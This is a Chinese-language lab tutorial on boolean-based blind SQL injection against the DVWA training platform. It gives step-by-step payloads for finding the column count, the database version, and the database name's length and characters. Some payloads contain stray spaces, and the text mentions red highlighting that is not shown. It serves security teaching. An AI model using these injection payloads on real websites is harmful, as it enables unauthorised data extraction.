实验准备:
DVWA漏洞演练平台,浏览器
1.检查漏洞是否存在
先把DVWA的level修改为low
正常输入1返回正常页面-_-||
2.探测当前表的字段数
再选中SQL Injection(Blind),在右侧输入 1 ' order by 10 --' ,语句中的10可以用任意数字代替,探测字段数
3.测试数据库版本号
输入 1'and left(version(),1)= 1 and '1'='1 红色标注的1为可变的,依次改为2,3,4,5...出现正确页面,可确定版本号为几。
4.测试数据库长度
输入 1' and length(database())= 1 and '1'='1 红色标注的1为可变的,依次改为2,3,4,5...出现正确页面,可确定数据库长度
5.测试数据库名称第1个字符
通过上一个步骤可得到数据库长度,输入 1' and left(database(),1)=' a' and '1'='1 红色标注的a为可变的,可改为a-z,直到出现正确页面即可确定第一个字符
6.测试数据库名称第2个字符
通过上一个步骤得知第1个字符,假设为a,此时输入 1' and left(database(), 2)='a a' and '1'='1 红色标注的a与步骤1一样,与步骤1类比,我们要测试数据库名称,要修改红色标注处的2,第几个名称就改为几,并且,在红色标注a为猜测的字符,红色标注a之前的字符必须正确,数据库名称的猜测要一步一步猜。